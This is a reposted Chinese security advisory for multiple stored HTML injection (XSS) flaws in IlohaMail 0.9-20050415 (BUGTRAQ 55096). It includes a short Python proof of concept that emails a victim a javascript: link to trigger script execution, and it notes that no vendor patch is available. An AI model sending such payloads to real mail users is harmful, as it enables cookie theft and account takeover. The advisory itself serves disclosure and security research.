IlohaMail 'Bookmarks'模块多个HTML插入漏洞

发布日期:2012-08-18
更新日期:2012-08-23

受影响系统:
sourceforge IlohaMail 0.9-20050415
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55096

IlohaMail是一个轻量级的而且功能丰富的支持多国语言的webmail系统。

IlohaMail 0.9-20050415及其他版本在实现上存在多个HTML注入漏洞,利用这些漏洞可允许攻击者在受影响站点中执行HTML和脚本代码,窃取Cookie身份验证凭证或控制站点外观。

<*来源:Shai rod
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Shai rod ()提供了如下测试方法:

import smtplib

print "###############################################"
print "#          IlohaMail Stored XSS POC           #"
print "#             Coded by: Shai rod              #"
print "#               @NightRang3r                  #"
print "#                         #"
print "#       For Educational Purposes Only!        #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server  = "192.168.1.10"
smtp_port = 25
subject = "IlohaMail Webmail XSS POC"


# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
       % (sender, ", ".join(recipient), subject) )
msg += "Content-type: text/html\n\n"
msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n"""
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"

建议:
--------------------------------------------------------------------------------
厂商补丁:

sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wysxsj.html